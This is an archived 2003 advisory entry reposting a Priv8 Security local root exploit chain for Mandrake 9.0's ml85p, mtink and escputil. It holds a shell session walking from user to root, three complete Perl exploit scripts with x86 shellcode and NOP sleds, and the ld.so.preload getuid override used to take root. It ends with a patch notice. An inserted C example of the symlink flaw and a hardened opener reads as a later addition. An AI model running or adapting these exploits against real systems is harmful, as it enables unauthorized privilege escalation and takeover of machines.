28th Feb 2003 [SBWID-6030]
COMMAND
	ml85p local root exploit
SYSTEMS AFFECTED
	Mandrake 9
PROBLEM
	From the Priv8 Security advisory:
	
	 http://www.priv8security.com
	
	Credits to iDefense [http://www.idefense.com/advisory/01.21.03.txt]
	Ok, our goal is to get root by exploiting ml85p, which is suid root by
	default on Mandrake 9.0.
	
	[wsxz@localhost priv8]$ ls -l /usr/bin/ml85p
	-rwsr-x---    1 root     sys         12344 Set 17 16:40 /usr/bin/ml85p*
	
	You can see that we're gonna need group sys to run it, so first let's get it.
	 
	[wsxz@localhost priv8]$ ls -l /usr/bin/mtink
	-rwxr-sr-x    1 lp       sys        132600 Set 17 16:40 /usr/bin/mtink*
	[wsxz@localhost priv8]$ ls -l /usr/bin/escputil
	-rwxr-sr-x    1 lp       sys         32088 Set 17 16:40 /usr/bin/escputil*
	
	We have two here that are vulnerable: mtink has a stack overflow on the
	HOME environment variable, and escputil has a stack overflow too, on a
	command line argument; for more details read the iDefense advisory.
	So here we go.... First we get gid sys by exploiting mtink or escputil,
	you can choose which one you want to.
	
	[wsxz@localhost priv8]$ id
	uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
	[wsxz@localhost priv8]$ perl priv8mtink.pl
	 Priv8security.com Mandrake 9 mtink local sys exploit!!
	 usage: priv8mtink.pl offset
	 Using address: 0xbffffa80
	sh-2.05b$ id
	uid=503(wsxz) gid=3(sys) groups=503(wsxz)
	
	And now we can exploit ml85p.
	1 - Writing any file on the system!!!
	
	sh-2.05b$ perl priv8ml85p.pl /root/hi-there-Mr-root
	Let write some files ok ;p
	Now just press enter ;)
	Wrong file format.
	file position: ffffffff
	sh-2.05b$
	
	Now we check if it worked....
	
	[root@localhost root]# pwd
	/root
	[root@localhost root]# ls -l hi*
	-rw-rw-rw-    1 root     sys             0 Fev 24 03:32 hi-there-Mr-root
	
	2 - Getting root with it ;)
	I will do the same thing as in the iDefense advisory, so let's do it..
	
	sh-2.05b$ id
	uid=503(wsxz) gid=3(sys) groups=503(wsxz)
	sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
	Let write some files ok ;p
	Now just press enter ;)
	Wrong file format.
	file position: ffffffff
	sh-2.05b$ ls -l /etc/ld.so.preload
	-rw-rw-rw-    1 root     sys             0 Feb 26 00:12
	/etc/ld.so.preload
	sh-2.05b$ cd /tmp
	sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
	sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
	sh-2.05b$ gcc -fPIC -c /tmp/lib.c
	sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
	sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
	sh-2.05b$ su -
	[root@localhost root]# id
	uid=0(root) gid=0(root) grupos=0(root)
	
	It worked, so take care what you'll write ok ;) that's it.
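The file-creation flaw the walkthrough relies on, shown as an added example that is not from the advisory or from ml85p's own source: a privileged program that creates a file at a predictable /tmp name with a plain O_CREAT open follows a symlink planted there, and the caller's umask (the exploit sets umask 000) decides the new file's mode, which is how the world-writable /root/hi-there-Mr-root and /etc/ld.so.preload above appear. The hardened opener refuses both; the ml85p-like behaviour in `unsafe_create` and all paths under /tmp/ml85p-demo-* are assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern (models the behaviour the advisory describes; ml85p's
 * real source is not on the page): a plain O_CREAT open follows a symlink
 * planted at a predictable name, creating the attacker's chosen path with
 * mode 0666 & ~umask, and the attacker controls the umask. */
int unsafe_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened pattern: never follow a symlink, never reuse an existing name,
 * and set the mode explicitly instead of trusting the inherited umask. */
int safe_create(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;          /* EEXIST/ELOOP: the name was pre-planted */
    if (fchmod(fd, 0600) < 0) { close(fd); unlink(path); return -1; }
    return fd;
}

/* Rebuilds the advisory's scenario in a private directory (all names are
 * constructed): a symlink at a predictable ml85g* name points at a target
 * that does not exist yet. Returns the mode unsafe_create gave the target
 * when safe_create refused the same planted link; -1 on any setup failure
 * or if the hardened opener did not refuse. */
int symlink_demo(void)
{
    char dir[] = "/tmp/ml85p-demo-XXXXXX", target[80], link[80];
    struct stat st;
    int fd, mode, refused;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/root-owned-file", dir);
    snprintf(link, sizeof link, "%s/ml85g1046048400", dir);
    if (symlink(target, link) < 0) return -1;
    umask(0);                               /* the exploit's "umask 000" */
    fd = unsafe_create(link);               /* follows the link: target appears */
    if (fd < 0 || lstat(target, &st) < 0) return -1;
    close(fd);
    mode = st.st_mode & 0777;               /* 0666: the -rw-rw-rw- seen above */
    unlink(target);
    refused = safe_create(link) < 0;        /* O_EXCL|O_NOFOLLOW rejects the link */
    unlink(link); rmdir(dir);
    return refused ? mode : -1;
}
```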
	
	------------------------------------------------------------------------------------------------------------------
	priv8escputil.pl
	------------------------------------------------------------------------------------------------------------------
	#!/usr/bin/perl
	######################################################
	# Priv8security.com escputil local sys exploit.
	#
	#     Tested on Mandrake 9.0 only.
	#     Based on http://www.idefense.com/advisory/01.21.03.txt
	#
	#####################################################
	$shellcode =
	    "\x31\xc0\xb0".                     # setregid(x,x) - where x = x03 sys gid
	    "\x03".                             # x = x03 sys gid
	    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80". # end setregid()
	    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
	    "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";   # execve("/bin//sh")
	$size    = 1050;
	$retaddr = 0xbffff4e0;
	$nop     = "\x90";
	$offset  = 0;
	if (@ARGV == 1) {
	    $offset = $ARGV[0];
	}
	print " Priv8security.com Mandrake 9 escputil local sys exploit!!\n";
	print " usage: $0 offset\n";
	# NOP sled, then the shellcode, then the return address repeated to the end
	for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) {
	    $buffer .= $nop;
	}
	$buffer .= $shellcode;
	print " Using address: 0x", sprintf('%lx', ($retaddr + $offset)), "\n";
	$newret = pack('l', ($retaddr + $offset));
	for ($i += length($shellcode); $i < $size; $i += 4) {
	    $buffer .= $newret;
	}
	exec("/usr/bin/escputil -c -P $buffer");
	------------------------------------------------------------------------------------------------------------------
	priv8ml85p.pl
	------------------------------------------------------------------------------------------------------------------
	#!/usr/bin/perl
	######################################################
	# Priv8security.com ml85p local root exploit.
	#
	#      This exploit erases any file on the system; you'll need
	#      group sys to do it, so run priv8mtink.pl or priv8escputil.pl
	#      to get it ;)
	#     Tested on Mandrake 9.0 only.
	#     Based on http://www.idefense.com/advisory/01.21.03.txt
	#
	#####################################################
	if (@ARGV == 1) {
	    $file = $ARGV[0];
	    $b = "/tmp/ml85g";
	    $b .= time();
	    umask 000;                       # so the file ml85p creates ends up 0666
	    system("ln -s $file '$b'");      # ml85p follows the symlink to $file
	    print "Lets write some files ok ;p\n";
	    print "Now just press enter....\n";
	    if (system("/usr/bin/ml85p -s") == -1) {
	        print "You cant run ml85p, check if u have gid sys...\n";
	    }
	    exit(1);
	} else {
	    print "\n!!! Priv8security.com ml85p local root exploit by wsxz !!!\n";
	    print "    Usage: perl $0 file-to-overwrite\n\n";
	}
	------------------------------------------------------------------------------------------------------------------
	------------------------------------------------------------------------------------------------------------------
	priv8mtink.pl
	------------------------------------------------------------------------------------------------------------------
	#!/usr/bin/perl
	######################################################
	# Priv8security.com mtink local sys exploit.
	#
	#     Tested on Mandrake 9.0 only.
	#     Based on http://www.idefense.com/advisory/01.21.03.txt
	#
	#####################################################
	$shellcode2 =
	    "\x31\xc0\xb0".                     # setregid(x,x) - where x = x03 sys gid
	    "\x03".                             # x = x03 sys gid
	    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80". # end setregid()
	    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
	    "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";   # execve("/bin//sh")
	$size    = 1056;
	$retaddr = 0xbffffa80;
	$nop     = "\x90";
	$offset  = 0;
	if (@ARGV == 1) {
	    $offset = $ARGV[0];
	}
	print " Priv8security.com Mandrake 9 mtink local sys exploit!!\n";
	print " usage: $0 offset\n";
	# NOP sled, then the shellcode, then the return address repeated to the end
	for ($i = 0; $i < ($size - length($shellcode2) - 4); $i++) {
	    $buffer .= $nop;
	}
	$buffer .= $shellcode2;
	print " Using address: 0x", sprintf('%lx', ($retaddr + $offset)), "\n";
	$newret = pack('l', ($retaddr + $offset));
	for ($i += length($shellcode2); $i < $size; $i += 4) {
	    $buffer .= $newret;
	}
	local($ENV{'HOME'}) = $buffer;       # the overflow is in mtink's handling of HOME
	exec("/usr/bin/mtink");
	------------------------------------------------------------------------------------------------------------------
	
SOLUTION
	A patch written by Till Kamppeter was applied to ml85p to fix that
	vulnerability. Updates are provided for Mandrake Linux 8.1 through 9.0
	for the printer-drivers packages, and for ghostscript in 8.0, to fix these
	vulnerabilities (MDKSA-2003:010).